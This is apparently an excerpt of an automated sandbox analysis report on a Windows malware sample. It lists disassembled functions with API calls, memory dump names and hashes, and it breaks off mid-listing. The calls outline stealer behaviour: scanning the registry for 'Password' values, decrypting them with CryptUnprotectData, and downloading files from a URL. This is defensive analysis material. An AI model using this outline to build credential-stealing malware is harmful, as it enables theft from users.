                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: b126233d7e5f0cc89093de88a5e2fd583c38626e1f107a6d9b962ec15cc0a726
                            • Instruction ID: d634084d662159239b4182ad3ee0e3270404c91a3ee742c84bf43c40b665d803
                            • Opcode Fuzzy Hash: b126233d7e5f0cc89093de88a5e2fd583c38626e1f107a6d9b962ec15cc0a726
                            • Instruction Fuzzy Hash: 7E614D7191016CABCB55DB64DC58AED77B9FF48300F5089A9B60AE3250EF709F858F90
                            Function 008E6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E6AFF
                            • InternetOpenA.WININET(0090CFF4,00000001,00000000,00000000,00000000), ref: 008E6B2C
                            • StrCmpCA.SHLWAPI(?,012FFAC8), ref: 008E6B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 008E6B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008E6B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008E6BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 008E6BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008E6BF0
                            • CloseHandle.KERNEL32(00000000), ref: 008E6C10
                            • InternetCloseHandle.WININET(00000000), ref: 008E6C17
                            • InternetCloseHandle.WININET(?), ref: 008E6C21
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: 9ab051a9bbafce6f6486e2bff818fb6e30e8a97388e0dd015535222fdbffc259
                            • Instruction ID: c7479c1c886554002643c16de6254413851547825ca61d15ace2742fa8df5ea6
                            • Opcode Fuzzy Hash: 9ab051a9bbafce6f6486e2bff818fb6e30e8a97388e0dd015535222fdbffc259
                            • Instruction Fuzzy Hash: C641A171A00205ABDB20DF65DC89FEE77B8FB54740F448464FA05E7280EF70AE418BA4
                            Function 008EBBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EBC1F
                            • lstrlen.KERNEL32(00000000), ref: 008EBC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EBC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008EBC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EBCAC
                            • lstrlen.KERNEL32(00914ADC), ref: 008EBD23
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 05b00036605fab8a67a7c053c66ae4722f756e430f5d2cb9dc03e444425c4616
                            • Instruction ID: 3ad661143d642e531003685533fcdcc38c9b948fba3b64df4f4467d79dc6a202
                            • Opcode Fuzzy Hash: 05b00036605fab8a67a7c053c66ae4722f756e430f5d2cb9dc03e444425c4616
                            • Instruction Fuzzy Hash: C3A19031A012859FCB25EF6ADD49AAFB7B4FF46304F288069E405EB261DB71DC42CB51
                            Function 009060F0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 0090613A
                            • std::_Xinvalid_argument.LIBCPMT ref: 00906159
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00906224
                            • memmove.MSVCRT(00000000,00000000,?), ref: 009062AF
                            • std::_Xinvalid_argument.LIBCPMT ref: 009062E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: e46234bc25d4628fc49411e88dd13fb9d154f210621c7d218351553351110146
                            • Instruction ID: 18f8de3d3d0952a15eaf9398dad5853160ce151c1be0aeca91b1bee6e2c00904
                            • Opcode Fuzzy Hash: e46234bc25d4628fc49411e88dd13fb9d154f210621c7d218351553351110146
                            • Instruction Fuzzy Hash: 17616D70714205DFDB18CF9CD891A6EB7B6EF85704B244919E4A2CB3C2C730ADA09B95
                            Function 008FE229 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE24F
                            • lstrcat.KERNEL32(?,00000000), ref: 008FE25D
                            • lstrcat.KERNEL32(?,?), ref: 008FE278
                            • lstrcat.KERNEL32(?,?), ref: 008FE28C
                            • lstrcat.KERNEL32(?,012EA7F0), ref: 008FE2A0
                            • lstrcat.KERNEL32(?,?), ref: 008FE2B4
                            • lstrcat.KERNEL32(?,012FE380), ref: 008FE2C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE2FF
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008FE306
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: 6c2feeab227d5f17b43db6bb559df484ae2203389f377199583d66a73c2c3bfb
                            • Instruction ID: 0ed96738b085100408cc3e33372ef15a009913495e8304ee711df128526d426f
                            • Opcode Fuzzy Hash: 6c2feeab227d5f17b43db6bb559df484ae2203389f377199583d66a73c2c3bfb
                            • Instruction Fuzzy Hash: 0B415B7291016C9BCB25EB78D849AED77B8FF48300F5489A5B60AD3250DF709F858B91
                            Function 008E7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008E77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008E7805
                              • Part of subcall function 008E77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008E784A
                              • Part of subcall function 008E77D0: StrStrA.SHLWAPI(?,Password), ref: 008E78B8
                              • Part of subcall function 008E77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E78EC
                              • Part of subcall function 008E77D0: HeapFree.KERNEL32(00000000), ref: 008E78F3
                            • lstrcat.KERNEL32(00000000,00914ADC), ref: 008E7A90
                            • lstrcat.KERNEL32(00000000,?), ref: 008E7ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 008E7ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 008E7AF0
                            • wsprintfA.USER32 ref: 008E7B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E7B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008E7B47
                            • lstrcat.KERNEL32(00000000,00914ADC), ref: 008E7B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: 4e4642ad2766a1412f63b860b938a391804ac22aa6b128c20e5a7aef050c90f5
                            • Instruction ID: e5be4dc69c9885120c0869d2076b7d1f27edab5e5efcb92b6c14c08047b75c86
                            • Opcode Fuzzy Hash: 4e4642ad2766a1412f63b860b938a391804ac22aa6b128c20e5a7aef050c90f5
                            • Instruction Fuzzy Hash: 56316276A04298EFCB10DBA9DC489EFB779FBC9714F648519E90AD3200DF70A941CB60
                            Function 008F82F0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 008F834C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F8383
                            • lstrlen.KERNEL32(00000000), ref: 008F83A0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F83D7
                            • lstrlen.KERNEL32(00000000), ref: 008F83F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F842B
                            • lstrlen.KERNEL32(00000000), ref: 008F8448
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F8477
                            • lstrlen.KERNEL32(00000000), ref: 008F8491
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F84C0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 24ec387ee0a4abd5ab490ad3b6a913ff8defbbaf673a26460029c8b7d50ff6df
                            • Instruction ID: 6c1c4b7f084af91a3d956f703142c9b3a44268c15194e558937f4409ec6d1cb6
                            • Opcode Fuzzy Hash: 24ec387ee0a4abd5ab490ad3b6a913ff8defbbaf673a26460029c8b7d50ff6df
                            • Instruction Fuzzy Hash: 97515C71500217EBDB14AF39D848AABB7A8FF15300F108564AD06EB245EF70E960CBD0
                            Function 008E77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008E7805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008E784A
                            • StrStrA.SHLWAPI(?,Password), ref: 008E78B8
                              • Part of subcall function 008E7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 008E775E
                              • Part of subcall function 008E7750: RtlAllocateHeap.NTDLL(00000000), ref: 008E7765
                              • Part of subcall function 008E7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008E778D
                              • Part of subcall function 008E7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008E77AD
                              • Part of subcall function 008E7750: LocalFree.KERNEL32(?), ref: 008E77B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E78EC
                            • HeapFree.KERNEL32(00000000), ref: 008E78F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 008E7A35
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: ddf03ea2b7c74ee7def9551414a286161d9c90a8841d613214b8962603cf01c5
                            • Instruction ID: e937cc2d32d06ffbcfd589890d531492f688ae4d671a5e916a7d055958a1ec8d
                            • Opcode Fuzzy Hash: ddf03ea2b7c74ee7def9551414a286161d9c90a8841d613214b8962603cf01c5
                            • Instruction Fuzzy Hash: 36711EB1D0025DABDB10DF95DC80ADEBBB8FF49300F5085A9E609E7241EB359A85CB91
                            Function 00904710 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,008F5099), ref: 00904755
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0090475C
                            • wsprintfW.USER32 ref: 0090476B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 009047DA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 009047E9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 009047F0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                            • String ID: %hs
                            • API String ID: 885711575-2783943728
                            • Opcode ID: 29a68149efe899474509ae8dfc177fd6967306be4319faf417bc3ef877aa0848
                            • Instruction ID: 0e650841d5ea72b6a94ee39320c8f810aac78d635fa86ff075ff859ea7e25955
                            • Opcode Fuzzy Hash: 29a68149efe899474509ae8dfc177fd6967306be4319faf417bc3ef877aa0848
                            • Instruction Fuzzy Hash: 2C312B72A10249BBDB20DBE4DC89FDEB77CBF49B01F108455FA05E7180DB70AA418BA5
                            Function 008E1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E1135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E113C
